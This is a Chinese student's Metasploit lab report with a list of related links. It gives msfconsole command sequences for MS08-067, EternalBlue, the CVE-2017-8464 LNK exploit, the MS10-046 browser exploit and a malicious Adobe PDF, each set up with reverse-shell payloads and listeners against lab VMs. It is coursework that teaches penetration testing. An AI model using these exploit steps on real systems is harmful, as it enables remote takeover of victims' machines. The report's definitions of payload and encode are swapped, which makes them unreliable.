Exp5 MSF基础应用 20164309 欧阳彧骁
1.实验内容
1.0Armitage初体验
在kali端输入 armitage 启动armitage
发现开启失败,更根据提示先输入 /etc/init.d/postgresql start ,打开postgresql服务再进入armitage
更改端口为学号4309,其他选项默认不变
进入界面发现没有可以攻击的主机
选择上方菜单栏hosts-nmap scan-quick scan(os detect)进行扫描
对虚拟机所在的网段进行扫描
选中靶机,右键选择services,查看可以利用的端口
右键选择scan进行扫描
选择上方菜单栏attacks-findattacks
可以进行攻击了!
对win7端攻击失败后,我增添了一台xp sp3继续进行实验;
选中目标主机右键attack-smb-ms08_067_netapi
在攻击win7失败后,我下载了一个xp进行实验,攻击仍然失败,猜测应该是与xp系统的中英文版本有关,中文盗版猖獗,每次有新补丁盗版方还会贴心地给用户打上。。。
重新下载一个windows2003 server sp2,进行相关攻击
2003端仍然失败,重新在windows 2000 sp4上实验还是失败,也许不是系统版本与相关补丁的问题,可能是kali上的armitage配置出现了一些问题,暂时排除不了具体原因,还是用老办法msfconsole继续实验吧。
1.1三个主动攻击实践+成功应用任何一个辅助模块+唯一
1.1.1 ms08_067_netapi
攻击端:kali 2019 192.168.236.131
靶机:win 2000 sp4 192.168.236.143
输入 msfconsole
输入 search ms08_067 ,查找可用的exploit
输入 use exploit/windows/smb/ms08_067_netapi
输入 show payloads 对可使用的payload进行查找,这里我使用generic/shell_reverse_tcp
输入 set payload generic/shell_reverse_tcp
配置攻击源地址源端口与目的地址
set RHOST 192.168.236.143 set LPORT 4309 set LHOST 192.168.236.131
输入 show options 查看具体信息
输入 exploit 进行渗透攻击
攻击成功
1.1.2 ms17_010_eternalblue+ auxiliary辅助模块扫描
攻击端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶机:Win 7 旗舰版 ip:192.168.236.128
还是没有死心,打算再次使用armitage实验。
选中靶机,在armitage左侧目录中选择exploit-windows-smb-ms_010_eternalblue
看似是攻击成功了,但是在连接sessions与调用meterpreter shell是出现了问题,看来应该是我kali中armitage工具不够完善。还是乖乖滚回去用msf吧。
进入msfconsole
输入 search ms17 type: auxiliary platform:windows 查找永恒之蓝的auxiliary辅助模块扫描指令
输入 use auxiliary/scanner/smb/smb_ms17_010
输入 set RHOSTS 192.168.239.129 设置目标地址
输入 run 进行扫描
能够建立连接,开始正式攻击
use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/shell/reverse_tcpset RHOST 192.168.236.128 set LPORT 4309 set LHOST 192.168.236.131show options exploit
攻击成功。
1.1.3 cve 2017_8464 (震网三代) (唯一)
use exploit/windows/fileformat/cve_2017_8464_lnk_rceset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.236.131exploit
输入 cp -r /root/.msf4/local/ /root/1 将生成的文件从隐藏文件夹中复制出来
将文件导出至U盘,连接到靶机中。
kali端进行监听:
search multi/handler use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.236.131run
在靶机运行U盘中的FlashPlayerCPLAPP.cpl
攻击成功。
1.2 一个针对浏览器的攻击:ms10_046
攻击端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶机:Win xp ps3 ip:192.168.236.134
进入msfconsole
输入 search ms10_046
输入 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_httpset RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131show options exploit
靶机连接http://192.168.236.131:80/
输入session -i 1 连接id为1的session获取shell
攻击成功。
1.3 一个针对客户端的攻击:adobe_pdf_embedded_exe
攻击端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶机:Win xp ps3 ip:192.168.236.134
进入msfconsole
输入 search adobe type:exploit platform:windows 查找可用漏洞,这里我选择了adobe_pdf_embedded_exe
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show payloads
Set payload windows/meterpreter/reverse_tcpset RHOST 192.168.236.134 set RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131 set FILENAME 20164309.pdf show options exploit
生成文件20164309.pdf
使用nc将文件传输到靶机中
ncat.exe -lv 4309 > 20164309.pdf nc192.168.236.134 4309 < 20164309.pdf
攻击机中进行监听
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.236.131 set LPORT 4309exploit
靶机中打开文件,攻击成功。
2.基础问题回答
用自己的话解释什么是exploit,payload,encode.
Exploit:“利用”,通过漏洞来攻击受害者,也就是拉货的马;
Payload:“编码”,去掉“坏字符”,为渗透攻击做准备;改变特征码,起到免杀作用;也就是货车;
Encode:“有效负载”、“shellcode”,能够在受害者环境中进行操作,也就是装货的车厢。
整个攻击过程就是马拉着装满货物的车送往目的地。
3.实践总结体会
3.1总结体会
本次实验是我历时最长的一次实验,也是收获最大的一次实验。包括实验报告的撰写实验五一共花费了我四个晚上的时间,让我深深明白了什么是自学。在实验的开始我打算图方便使用armitage进行自动化攻击,导致我在不停下载与更换虚拟机上浪费了过多的时间,最后还是没有排除无法成功应用armitage。其实我还尝试了WebExec(CVE-2018-15442)与mssql_payload但均以失败告终,这也让我感受到了我能力的不足。
3.2离实战还缺些什么技术或步骤
缺的东西大了去了,以我的水平只是到应用msf工具的水平,还不能详细的阐述攻击的原理;并且meterpreter库中更新不及时,很多漏洞都及时被windows官方发现与修复,实战性不强;同时像payload的编写、encode的设计我们都没有能力实现,导致攻击方法单一,水准不够高。
转载于:https://www.cnblogs.com/20164309-kx/p/10699118.html
Exp5 MSF基础应用 20164309 欧阳彧骁相关推荐
- Exp1 PC平台逆向破解 20164309 欧阳彧骁
一.实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getS ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155210 Exp5 MSF基础应用
Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 如图: 根据上图,我们输入 ...
- 20155216 Exp5 MSF基础应用
Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用. 一 ...
- 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 《网络对抗》Exp5 MSF基础应用
20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...
- 20155220 Exp5 MSF基础应用
Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 根据上图,我们输入use ...
最新文章
- Activity创建
- QCon 2015 阅读笔记 - 团队建设
- 10行代码理解Java锁消除
- python 乘法运算定律_计算机组成原理(上)资料
- SpringAOP拦截Controller,Service实现日志管理(自定义注解的方式)
- python xlwt模块生成excel文件并写入数据 xlrd读取数据
- 随笔记录(2019.7.10)
- 苹果手机内存怎么查_为什么苹果手机内存越用越小
- [.NET] 怎样使用 async await 一步步将同步代码转换为异步编程
- git bash here 找不到应用程序_git 简单命令
- JMeter Exception: java.net.BindException: Address already in use: connect(转)
- python工资一般多少-Python就业都有哪些岗位?每个岗位薪资多少?
- v9更新系统后为何显示服务器连接,红伞V9升级不能……报告里说好多文件无法与服务器建立连接……...
- pyinstaller编译出的exe被杀毒软件认为是木马
- L19.linux命令每日一练 -- 第三章 文件过滤及内容编辑处理命令 -- tailf和cut命令
- 创建型模式之简单工厂模式
- 杀死一只知更鸟的方法教会了我如何成为一名混乱大师
- gyb的常用lazyCopy
- 魅族mx4 android5.0,第一手更新 魅族MX4Pro安卓5.0抢先体验
- apache ii评分怎么评_如何正确进行APACHE II评分
热门文章
- android开发期间使用真机调试但系统无法识别出真机
- android IntentService
- mysql 命令行导入sql脚本
- 7-55 空心字母金字塔 (10 分)
- java方面的文献综述怎么写_如何写文献综述?
- Linux内核地址空间为什么1GB,为什么Windows为其系统地址空间预留1Gb(或2 Gb)?
- php gdk,gdk.php
- innobackupex 数据库备份
- 获取一组radio按钮选中的值Value
- 【旧文章搬运】Windows内核常见数据结构(线程相关)